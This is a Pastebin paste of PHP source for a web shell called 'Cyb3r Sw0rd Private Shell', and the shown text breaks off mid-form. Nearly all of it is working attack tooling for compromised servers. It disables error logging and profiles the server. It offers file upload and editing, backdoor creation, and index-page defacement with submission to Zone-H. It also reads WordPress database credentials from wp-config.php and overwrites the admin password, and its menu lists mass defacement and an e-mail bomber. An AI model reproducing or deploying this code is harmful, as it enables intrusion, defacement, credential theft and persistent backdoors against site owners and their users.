nil_007

br

Jan 29th, 2019
391
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 357.57 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Cyb3r Sw0rd Private Shell V-1.1</title>
  4. <style type='text/css'>
  5. body
  6. {
  7. background-color: #000000;
  8. font-family: Tahoma, Geneva, Verdana;
  9. margin: auto;
  10. color: #FFF;
  11. }
  12. .header
  13. {
  14. background-color: #222222;
  15. color: #FFF;
  16.  
  17. border-top: 1px solid #067700;
  18. border-bottom: 1px solid #067700;
  19. text-align: center;
  20. border-radius: 5px;
  21. width:100%;
  22. line-height: 40px;
  23. font-size: 30px;
  24. }
  25. .box
  26. {
  27. background-color: #222222;
  28. color: teal;
  29. border-top: 1px solid #067700;
  30. border-bottom: 1px solid #067700;
  31. padding: 5px;
  32. border-radius: 5px;
  33. }
  34. .box a{ padding: 5px; border: 1px solid #007700; box-shadow: 0px 0px 3 #007700; color: #007700; text-decoration: none;color: #007700; text-shadow: 0px 0px 0px #007700; font-weight: bold; font-family: Tahoma, Geneva, sans-serif; font-size:12px; padding: 1px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(85,85,85) 0px 0px 0px; -moz-box-shadow: rgb(85,85,85) 0px 0px 0px; }
  35. .box a:hover{ padding: 5px; border: 1px solid #00bb00; color: #00ff00; box-shadow: 0px 0px 3px #00bb00; text-shadow: 0px 0px 3px #00bb00; padding: 1px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(51,51,51) 0px 0px 3px; -moz-box-shadow: rgb(51,51,51) 0px 0px 3px;}
  36.  
  37. .menu
  38. {
  39. background-color: #222222;
  40. color: teal;
  41. border-top: 1px solid #6D8397;
  42. border-bottom: 1px solid #6D8397;
  43. padding: 5px;
  44. border-radius: 5px;
  45. text-align:center;
  46. }
  47. .menu a{ padding: 5px; border: 1px solid #001DD3; box-shadow: 0px 0px 3 #007700; color: #001DD3; text-decoration: none;color: #001DD3; text-shadow: 0px 0px 0px #001DD3; font-weight: bold; font-family: Tahoma, Geneva, sans-serif; font-size:12px; padding: 1px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(85,85,85) 0px 0px 0px; -moz-box-shadow: rgb(85,85,85) 0px 0px 0px; }
  48. .menu a:hover{ padding: 5px; border: 1px solid #4E63DC; color: #2194D7; box-shadow: 0px 0px 3px #2194D7; text-shadow: 0px 0px 3px #4E63DC; padding: 1px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(51,51,51) 0px 0px 3px; -moz-box-shadow: rgb(51,51,51) 0px 0px 3px;}
  49. .filemanager{ margin-left: 100px; color: #FFF; background-color: #222222; padding: 2px; margin-right: 100px; border: 1px solid #007700; }
  50. .filemanager a{ color: #FFF; font-size:18px; text-decoration:none;}
  51. .filemanager a:hover{ text-shadow: 1px 2px 5px #FFF; }
  52. .result {background-color: #87947A , color: #7ACA3C;}
  53. .slogan {background-color: red; color: #FFF; position:fixed;bottom:0;right:0; left:0}
  54. .thanksbox a {color: #E12729; font-weight: bold;}
  55. .thanksbox a:hover{color: #000000; background-color: #E12729;}
  56. .thanks_head{font-size:20; font-weight:bold}
  57. table:hover {background-color: #FF0000;}
  58. form {padding:0; margin:0;}
  59. </style>
  60. </head>
  61. <body>
  62. <div class="header">Cyb3r Sw0rd Private Shell <span style="font-size:15px;font-family:Comic Sans MS; color:red;"><i><b>V-1.1</b></i></span></div>
  63. <?php
  64. @session_start();
  65. @error_reporting(0);
  66. @ini_set('error_log',NULL);
  67. @ini_set('log_errors',0);
  68. @ini_set('max_execution_time',0);
  69. @set_time_limit(0);
  70. @set_magic_quotes_runtime(0);
  71. date_default_timezone_set('UTC');
  72. $self = $_SERVER["PHP_SELF"];
  73. $action = get(action);
  74. $result = "PGRpdiBjbGFzcz0ncmVzdWx0Jz4=";
  75. $auth_pass = "OWYwYTQ0ODRiOTMzMTM0ZDAzZTFjMzVhZTlmYjkwYjY=";
  76. function file_size($size, $round = 2) {
  77. $sizes = array('B', 'KB', 'MB', 'GB','TB');
  78. $total = count($sizes)-1;
  79. for ($i=0; $size > 1024 && $i < $total; $i++) $size /= 1024;
  80. return round($size,$round)." ".$sizes[$i];
  81. }
  82. function Zip($source, $destination)
  83. {
  84. if (!extension_loaded('zip') || !file_exists($source)) {
  85. return false;
  86. }
  87.  
  88. $zip = new ZipArchive();
  89. if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
  90. return false;
  91. }
  92.  
  93. $source = str_replace('\\', '/', realpath($source));
  94.  
  95. if (is_dir($source) === true)
  96. {
  97. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  98.  
  99. foreach ($files as $file)
  100. {
  101. $file = str_replace('\\', '/', realpath($file));
  102.  
  103. if (is_dir($file) === true)
  104. {
  105. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  106. }
  107. else if (is_file($file) === true)
  108. {
  109. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  110. }
  111. }
  112. }
  113. else if (is_file($source) === true)
  114. {
  115. $zip->addFromString(basename($source), file_get_contents($source));
  116. }
  117.  
  118. return $zip->close();
  119. }
  120.  
  121. function getperms ($file) {
  122. $perm = substr(sprintf('%o', fileperms($file)), -4);
  123. return $perm;
  124. }
  125.  
  126. if(isset($_GET['zip'])) {
  127. $src = $_GET['zip'];
  128. $dst = getcwd()."/".basename($_GET['zip']).".zip";
  129. if (Zip($src, $dst) != false) {
  130. $filez = file_get_contents($dst);
  131. header("Content-type: application/octet-stream");
  132. header("Content-length: ".strlen($filez));
  133. header("Content-disposition: attachment; filename=\"".basename($dst)."\";");
  134. echo $filez;
  135. }
  136. exit;
  137. }
  138.  
  139. function showDrives()
  140. {
  141. $self = $_SERVER["PHP_SELF"];
  142. $action = 'filemanager';
  143. foreach(range('A','Z') as $drive)
  144. {
  145. echo "<card id=\"main\" title=\"Drives\">";
  146. if(is_dir($drive.':\\'))
  147. {
  148. ?>
  149. &nbsp;&nbsp;&nbsp;&nbsp;<a href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>&action=<?php echo ".get(action)." ?>'>
  150. <?php echo $drive ?>
  151. </a>
  152. <?php
  153.  
  154. }
  155. echo "</card>";
  156. }
  157. }
  158.  
  159.  
  160. function HumanReadableFilesize($size)
  161. {
  162.  
  163. $mod = 1024;
  164.  
  165. $units = explode(' ','B KB MB GB TB PB');
  166. for ($i = 0; $size > $mod; $i++)
  167. {
  168. $size /= $mod;
  169. }
  170.  
  171. return round($size, 2) . ' ' . $units[$i];
  172. }
  173. function getFilePermissions($file)
  174. {
  175.  
  176. $perms = fileperms($file);
  177.  
  178. if (($perms & 0xC000) == 0xC000) {
  179. // Socket
  180. $info = 's';
  181. } elseif (($perms & 0xA000) == 0xA000) {
  182. // Symbolic Link
  183. $info = 'l';
  184. } elseif (($perms & 0x8000) == 0x8000) {
  185. // Regular
  186. $info = '-';
  187. } elseif (($perms & 0x6000) == 0x6000) {
  188. // Block special
  189. $info = 'b';
  190. } elseif (($perms & 0x4000) == 0x4000) {
  191. // Directory
  192. $info = 'd';
  193. } elseif (($perms & 0x2000) == 0x2000) {
  194. // Character special
  195. $info = 'c';
  196. } elseif (($perms & 0x1000) == 0x1000) {
  197. // FIFO pipe
  198. $info = 'p';
  199. } else {
  200. // Unknown
  201. $info = 'u';
  202. }
  203.  
  204. // Owner
  205. $info .= (($perms & 0x0100) ? 'r' : '-');
  206. $info .= (($perms & 0x0080) ? 'w' : '-');
  207. $info .= (($perms & 0x0040) ?
  208. (($perms & 0x0800) ? 's' : 'x' ) :
  209. (($perms & 0x0800) ? 'S' : '-'));
  210.  
  211. // Group
  212. $info .= (($perms & 0x0020) ? 'r' : '-');
  213. $info .= (($perms & 0x0010) ? 'w' : '-');
  214. $info .= (($perms & 0x0008) ?
  215. (($perms & 0x0400) ? 's' : 'x' ) :
  216. (($perms & 0x0400) ? 'S' : '-'));
  217.  
  218. // World
  219. $info .= (($perms & 0x0004) ? 'r' : '-');
  220. $info .= (($perms & 0x0002) ? 'w' : '-');
  221. $info .= (($perms & 0x0001) ?
  222. (($perms & 0x0200) ? 't' : 'x' ) :
  223. (($perms & 0x0200) ? 'T' : '-'));
  224.  
  225. return $info;
  226.  
  227. }
  228. function dirSize($directory) {
  229. $size = 0;
  230. foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file){
  231. try {
  232. $size += $file->getSize();
  233. }
  234. catch (Exception $e){ // Symlinks and other shits
  235. $size += 0;
  236. }
  237. }
  238. return $size;
  239. }
  240. function get($s)
  241. {
  242. $g = $_GET[$s];
  243. return $g;
  244. }
  245. function post($s)
  246. {
  247. $g = $_POST[$s];
  248. return $g;
  249. }
  250. function DBconnection($DB_Name, $DB_User, $DB_Host, $DB_Pass)
  251.  
  252. {
  253.  
  254.  
  255. $conms = @mysql_connect($DB_Host,$DB_User,$DB_Pass); //connect mysql
  256.  
  257. if(!$conms) return false;
  258.  
  259. $condb = @mysql_select_db($DB_Name);
  260.  
  261. if(!$condb) return false;
  262.  
  263. return true;
  264.  
  265. }
  266. function currentfile()
  267. {
  268. global $self;
  269. $destiny = substr_count($self,'/');
  270. $exp = explode('/',$self);
  271. $file = $exp[$destiny];
  272. return $file;
  273. }
  274. function mirror_zoneh($url, $hacker, $hackmode,$reson, $site )
  275. {
  276. $k = curl_init();
  277. curl_setopt($k, CURLOPT_URL, $url);
  278. curl_setopt($k,CURLOPT_POST,true);
  279. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  280. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  281. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  282. $kubra = curl_exec($k);
  283. curl_close($k);return $kubra;
  284. }
  285. function getfiletype_src($iurl)
  286. {
  287. $slc = substr_count($iurl,'/');
  288. $exp = explode('/',$iurl);
  289. $name = $exp[$slc];
  290. $slct = substr_count($name,'.');
  291. $expt = explode('.',$name);
  292. $type = $expt[$slct];
  293. return $type;
  294. }
  295. echo '<div class="box">';
  296. $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
  297. $clientIP = $_SERVER["REMOTE_ADDR"];
  298. $total = disk_total_space("/");
  299. $free = disk_free_space("/");
  300. $used = $total-$free;
  301. $parcent = ceil(($used*100)/$total);
  302.  
  303. echo 'Uname: <font color="00EF00">'.php_uname().'</font><br/>';
  304. echo 'Total Space : <font color="00EF00">'.file_size(disk_total_space("/")).'</font> ';
  305. echo 'Free Space : <font color="00EF00">'.file_size(disk_free_space("/")).'</font> ';
  306. echo 'Used Space : <font color="00EF00">'.file_size($used)." ($parcent%)</font><br>";
  307. echo 'Client IP: <font color="00EF00">'.$clientIP.'</font> ';
  308. echo 'Server IP: <font color="00EF00">'.$serverIP.'</font><br/>';
  309. echo 'PHP version: <font color="00EF00">'.phpversion().'</font> ';
  310. echo 'User: <font color="00EF00">['.getmyuid().'] '.get_current_user().' ('.getmygid().')</font><br/>';
  311. if(ini_get('safe_mode') == '1'){
  312. echo ' Safe mode:<font color="00EF00"> ON&nbsp;</font></font> ';
  313. }
  314. else{
  315. echo ' Safe mode:<font color="red"> OFF&nbsp;</font> ';
  316. }
  317. if(ini_get('magic_quotes_gpc') == '1'){
  318. echo ' Magic_quotes_gpc:<font color="00EF00"> ON&nbsp;</font> ';
  319. }
  320. else{
  321. echo ' Magic_quotes_gpc:<font color="red"> OFF&nbsp;</font> ';
  322. }
  323. if(function_exists('mysql_connect')){
  324. echo ' Mysql:<font color="00EF00"> ON&nbsp;</font><br/>';
  325. }
  326. else{
  327. echo ' Mysql:<font color="red"> OFF&nbsp;</font><br/>';
  328. }
  329. if(function_exists('mssql_connect')){
  330. echo ' Mssql: <font color="00EF00"> ON&nbsp;</font> ';
  331. }
  332. else{
  333. echo ' Mssql:<font color="red"> OFF&nbsp;</font> ';
  334. }
  335. if(function_exists('pg_connect')){
  336. echo ' PostgreSQL:<font color="00EF00"> ON&nbsp;</font> ';
  337. }
  338. else{
  339. echo ' PostgreSQL:<font color="red"> OFF&nbsp;</font> ';
  340. }
  341. if(function_exists('ocilogon')){
  342. echo ' Oracle:<font color="00EF00"> ON&nbsp;</font> ';
  343. }
  344. else{
  345. echo ' Oracle:<font color="red"> OFF&nbsp;</font> ';
  346. }
  347. if(function_exists('curl_version')){
  348. echo ' Curl:<b class="tul"><font color="00EF00"> ON&nbsp;</font></b><br/>';
  349. }
  350. else{
  351. echo ' Curl:<b class="tul"><font color="red"> OFF&nbsp;</font></b><br/>';
  352. }
  353. if(function_exists('exec')){
  354. echo ' Exec:<font color="00EF00"> ON&nbsp;</font> ';
  355. }
  356. else{
  357. echo ' Exec:<font color="red"> OFF&nbsp;</font> ';
  358. }
  359. if(!ini_get('open_basedir') != "on"){
  360. echo ' Open_basedir:<font color="red"> OFF&nbsp;</font> ';
  361. }
  362. else{
  363. echo ' Open_basedir:<font color="00EF00"> ON&nbsp;</font> ';
  364. }
  365. if(!ini_get('ini_restore') != "on"){
  366. echo ' Ini_restore:<b class="tul"><font color="red"> OFF&nbsp;</font></b><br/>';
  367. }
  368. else{
  369. echo ' Ini_restore:<b class="tul"><font color="00EF00"> ON&nbsp;</font></b><br/>';
  370. }
  371. if(function_exists('symlink')){
  372. echo ' Symlink:<font color="00EF00"> ON&nbsp;</font> ';
  373. }
  374. else{
  375. echo ' Symlink:<font color="red"> OFF&nbsp;</font> ';
  376. }
  377. if(function_exists('file_get_contents')){
  378. echo ' file_get_contents:<font color="00EF00"> ON&nbsp;</font> ';
  379. }
  380. else{
  381. echo ' file_get_contents:<font color="red"> OFF&nbsp;</font> ';
  382. }
  383. if(is_dir('sim/rut')){
  384. echo ' Permission:<font color="00EF00"> ON&nbsp;</font><br/>';
  385. }
  386. else{
  387. echo ' Permission:<font color="red"> OFF&nbsp;</font><br/>';
  388. }
  389. echo "Drives: ";showDrives();
  390. if (get('dir')=="")
  391. {
  392. $current_dir = str_replace("\\",'/',getcwd());
  393. }
  394. else
  395. {
  396. $current_dir = get('dir');
  397. }
  398. $a=explode('/',$current_dir);
  399. foreach ($a as $b)
  400. {
  401. $mexp = explode($b,$current_dir);
  402. $read_break_dir = $mexp[0].$b;
  403. $show_current_dir .= "<a href=\"?dir=$read_break_dir&action=filemanager\">$b/</a>";
  404. }
  405. echo "<br/><card id=\"main\" title=\"Directories\"> CD: $show_current_dir <a href=$self?action=filemanager><font color=red>Current</font></a></card><br/>";
  406. echo '</div>';
  407. echo '<div class="menu">';
  408. echo "<a href=$self>Home</a>
  409. <a href=?action=filemanager>File Manager</a>
  410. <a href=?action=symlink>Symlink</a>
  411. <a href=?action=zoneh>Mass Mirror</a>
  412. <a href=?action=massd>Mass Deface</a>
  413. <a href=?action=mailbomber>E-mail Bomber</a>
  414. <a href=?action=esql>SQL</a>
  415. <a href=?action=hash>Hash</a>
  416. <a href=?action=killme>Kill Me</a>
  417. ";
  418. echo '</div>';
  419. if (get(action)==filemanager)
  420. {
  421. echo "<div class=\"filemanager\">";
  422. if (get('dir')=="")
  423. {
  424. $current_dir = str_replace("\\",'/',getcwd());
  425. }
  426. else
  427. {
  428. $current_dir = get('dir');
  429. }
  430.  
  431. $scount = substr_count($current_dir,'/');
  432. $exp = explode('/',$current_dir);
  433. $name = $exp[$scount-1];
  434. $mexp = explode($name,$current_dir);
  435. $prevdir = $mexp[0].$name;
  436. if ($scount>0)
  437. {
  438. $a=explode('/',$current_dir);
  439. foreach ($a as $b)
  440. {
  441. $mexp = explode($b,$current_dir);
  442. $read_break_dir = $mexp[0].$b;
  443. $show_current_dir .= "<a href=\"?action=filemanager&dir=$read_break_dir\">$b</a>/";
  444. }
  445. echo "<div class=\"results\">";
  446. #File
  447. if (isset($_POST["newfilename"]))
  448. {
  449. $filename = post(newfilename);
  450. if (!file_exists($filename))
  451. {
  452. $source = "edit your source code here, coded by xl33tx_sn4p3r";
  453. $fp = fopen($filename, 'w');
  454. $r = fwrite($fp, $source);
  455. fclose($fp);
  456. echo "$filename File Created Successfully!<br/>";
  457. }
  458. else
  459. {
  460. header ("location: ?action=edit&file=$current_dir/$filename");
  461. }
  462.  
  463. }
  464. #Dir
  465. if (isset($_POST["newdirname"]))
  466. {
  467. $newdirname = post(newdirname);
  468. if (!file_exists($newdirname))
  469. {
  470. mkdir($newdirname);
  471. echo "$newdirname Directory created successfully!<br/>";
  472. }
  473. else
  474. {
  475. header ("location: ?action=filemanager&dir=$current_dir/$newdirname");
  476. }
  477.  
  478. }
  479. #upload
  480. if (isset($_POST["upload_option"]) && $_POST["upload_option"]==1)
  481. {
  482. $safe = post(safedeface);
  483. $target = post(target);
  484. if ($safe==1)
  485. {
  486. if (file_exists($target.'/index.php'))
  487. {
  488. rename($target.'/index.php','index2.php');
  489. }
  490. if (file_exists($target.'/index.html'))
  491. {
  492. rename($target.'/index.html',$target.'/index2.html');
  493. }
  494. }
  495. $default = post(defaultdeface);
  496. if ($default==1)
  497. {
  498. $dsc = "";
  499. $fp = fopen($target.'/index.php', 'w');
  500. $r = fwrite($fp, base64_decode($dsc));
  501. fclose($fp);
  502. $fp = fopen($target.'/index.html', 'w');
  503. $r = fwrite($fp, base64_decode($dsc));
  504. fclose($fp);
  505. }
  506. else
  507. {
  508. move_uploaded_file($_FILES['attach']['tmp_name'], $target."/".$_FILES['attach']['name']);
  509. }
  510. echo "File Uploaded Successfully!!";
  511. $host_info = $_SERVER["HTTP_HOST"];
  512. echo "<form action='?action=zone-h' method='post'><input type='hidden' name='defacer' value='Cyb3r_Sw0rd'><input type='hidden' name='hackmode' value='1'><input type='hidden' name='reason' value='1'><input name='domain' value='".$host_info."'><br/><input type='submit' value='Send To Zone-H' name='NotifyNowToZoneH' />";}
  513.  
  514. }
  515. #Backdoor
  516. if ($_POST['backdoor']==1)
  517. {
  518. $source = "";
  519. $fp = fopen($current_dir.'/phpinfo.php', 'w');
  520. $r = fwrite($fp, base64_decode($source));
  521. fclose($fp);
  522. echo "Backdoor Created Successfully!. This Site is Ready to get Future Damage :) ";
  523. }
  524.  
  525. echo "</div>";
  526. //echo "<font color=\"adrkpink\">Current Directory: $show_current_dir</font><br/>";
  527. echo "<a href=\"?action=".get(action)."&amp;dir=$prevdir\">Previous Directory</a><br/>";
  528. //echo "<form action=\"?action=$action\" method=\"post\"><input type=\"hidden\" name=\"dir\" value=\"".$prevdir."\"><input type=\"submit\" value=\"Previous Directory\"></a><br/>";
  529. echo "<div style=\"text-align:center; font-weight:bold\">[<a href=\"?action=$action&amp;dir=$current_dir\">All</a>] [<a href=\"?action=$action&amp;dir=$current_dir&short=dir\">Directories</a>] [<a href=\"?action=$action&amp;dir=$current_dir&short=file\">Files</a>]</div>";
  530.  
  531. if (!isset($page)) {$page = 0;}
  532. $total = 0;
  533. if(!($dp = opendir($current_dir))) die ("Cannot open This directory!");
  534. $file_array = array();
  535.  
  536. while ($file = readdir ($dp))
  537. {
  538. if(substr($file,0,1) != '.')
  539. {
  540. $file_array[] = $file;
  541. }
  542. }
  543. $file_count = count ($file_array);
  544. sort ($file_array);
  545. $items_per_page = $file_count;
  546. if ($file_count > 0)
  547. {
  548. if (file_exists($current_dir."/wp-config.php"))
  549. {
  550. include($current_dir."/wp-config.php");
  551. $DB_Name = DB_NAME;
  552. $DB_User = DB_USER;
  553. $DB_Pass = DB_PASSWORD;
  554. $DB_Host = DB_HOST;
  555. $DB_Table = $table_prefix;
  556. DBconnection($DB_Name, $DB_User, $DB_Host, $DB_Pass);
  557. $site = mysql_fetch_array(mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name='siteurl'"));
  558. $sitename = $site[0];
  559. echo "<font color=\"green\">Site Name:</font> <font color=\"red\">$sitename</font><br/>";
  560. echo "<a href=\"?action=".get(action)."&dir=$current_dir&donow=change_admin_quik\"><font color=\"red\">Change admin Password</font></a><br/>";
  561. if (get(donow)==change_admin_quik)
  562. {
  563. $res = mysql_query("UPDATE ".$table_prefix."users SET user_login='admin', user_pass='9f0a4484b933134d03e1c35ae9fb90b6' WHERE id=1");
  564. if ($res)
  565. {
  566. echo "<font color=\"yellow\">Admin ID &amp; Password Updated Successfully!<br/>";
  567. echo "<form target=\"_blank\" name=\"loginform\" id=\"loginform\" action=\"$sitename/wp-login.php\" method=\"post\">
  568. <input type=\"hidden\" name=\"log\" id=\"user_login\" class=\"input\" value=\"admin\" size=\"20\" tabindex=\"10\" />
  569. <input type=\"hidden\" name=\"pwd\" id=\"user_pass\" class=\"input\" value=\"aassdd\" size=\"20\" tabindex=\"20\" /></label>
  570. <input type=\"submit\" name=\"wp-submit\" id=\"wp-submit\" class=\"button-primary\" value=\"Log In\" tabindex=\"100\" />
  571. <input type=\"hidden\" name=\"redirect_to\" value=\"$sitename/wp-admin/\" /><input type=\"hidden\" name=\"testcookie\" value=\"1\" />
  572. </form>";
  573. }
  574. else
  575. {
  576. echo "<font color=\"red\">Error try again!</font>";
  577. }
  578. }
  579.  
  580. }
  581. $first_record = $page * $items_per_page;
  582. $last_record = $first_record + $items_per_page;
  583. while (list($fileIndexValue, $file_name) = each ($file_array))
  584. {
  585. if (($fileIndexValue >= $first_record) AND ($fileIndexValue < $last_record))
  586. {
  587.  
  588. if (get(short)==dir)
  589. {
  590. if (is_dir($current_dir.'/'.$file_name))
  591. {
  592. #echo "<a href=\"?action=$action&amp;dir=$current_dir/$file_name\">$file_name</a><br/>";
  593. echo '<table cellpadding="0" cellspacing="0" style="border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  594. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?dir='.$current_dir.'/'.$file_name.'&action=filemanager">'.$file_name.'</span></td>
  595. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
  596. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';
  597.  
  598. }
  599. }
  600. else if (get(short)==file)
  601. {
  602. if (!is_dir($current_dir.'/'.$file_name))
  603. {
  604. #echo "<a href=\"?action=edit&amp;file_name=$current_dir/$file_name\">$file_name</a> ". file_size(filesize("$current_dir/$file_name")/1024,1) . "<br/>";
  605. echo '<table cellpadding="0" cellspacing="0" style=" border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  606. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href=?action=edit&amp;file='.$current_dir.'/'.$file_name.'>'.$file_name.'</span></td>
  607. <td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.file_size(filesize($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=edit&amp;file_name='.$current_dir.'/'.$file_name.'">Edit</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
  608. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';
  609.  
  610. }
  611. }
  612. else{
  613.  
  614. if (is_dir($current_dir.'/'.$file_name))
  615. {
  616. /*
  617. echo '<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">';
  618. echo "<tr><td valign=\"top\" height=\"19\" width=\"300\"><p align=\"left\"><span lang=\"en-us\"><font face=\"Tahoma\" style=\"font-size: 9pt\"><a href=\"?action=$action&amp;dir=$current_dir/$file_name\">$file_name</a></span></td></table>";
  619.  
  620. echo '<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">';
  621. echo "<tr><td valign=\"top\" height=\"19\" width=\"300\"><p align=\"left\"><span lang=\"en-us\"><font face=\"Tahoma\" style=\"font-size: 9pt\"><a href=\"?action=$action&amp;dir=$current_dir/$file_name\">$file_name</a></span></td></table>";
  622. */
  623.  
  624. echo '<table cellpadding="0" cellspacing="0" style="border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  625. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?dir='.$current_dir.'/'.$file_name.'&action=filemanager">'.$file_name.'</span></td>
  626. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
  627. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';
  628. }
  629. else
  630. {
  631. /*
  632. echo '<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">';
  633. echo "<tr><td valign=\"top\" height=\"19\" width=\"300\"><p align=\"left\"><span lang=\"en-us\"><font face=\"Tahoma\" style=\"font-size: 9pt\"><a href=\"?action=edit&amp;file_name=$current_dir/$file_name\">$file_name</a></span></td>
  634. <td valign=\"top\" height=\"19\" width=\"65\"><font face=\"Tahoma\" style=\"font-size: 9pt\">". file_size(filesize("$current_dir/$file_name")/1024,1) . "</td>
  635. <td valign=\"top\" height=\"19\" width=\"30\"><font face=\"Tahoma\" style=\"font-size: 9pt\"> ".date('d/m/y',filemtime("$current_dir/$file_name"))."</td></table>";
  636. */
  637. echo '<table cellpadding="0" cellspacing="0" style="border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  638. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href=?action=edit&amp;file='.$current_dir.'/'.$file_name.'>'.$file_name.'</span></td>
  639. <td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.file_size(filesize($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=edit&amp;file_name='.$current_dir.'/'.$file_name.'">Edit</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
  640. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';
  641. }
  642. }
  643.  
  644. $total = $total + filesize("$current_dir/$file_name");
  645. }
  646.  
  647. }
  648. echo "<br/>";
  649. }
  650. echo "<hr/>";
  651. echo "<div>
  652. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  653. ___MK FILE___ <form method=\"post\"><input name=\"newfilename\"><input type=\"submit\" value=\">>\"></form>
  654. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  655. ___MK DIR___ <form method=\"post\"><input name=\"newdirname\"><input type=\"submit\" value=\">>\"></form>
  656. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  657. ___CREATE BACKDOOR___ <form method=\"post\"><input type=\"hidden\" name=\"backdoor\" value=\"1\"><input type=\"submit\" value=\">>\"></form>
  658. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  659. ___CHANGE DIR___ <form method=\"get\"><input name=\"dir\" value=\"$current_dir\"><input type=\"hidden\" name=\"action\" value=\"filemanager\"><input type=\"submit\" value=\">>\"></form>
  660. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  661. ___UPLOAD FILE___ <form enctype=\"multipart/form-data\" method=\"post\">
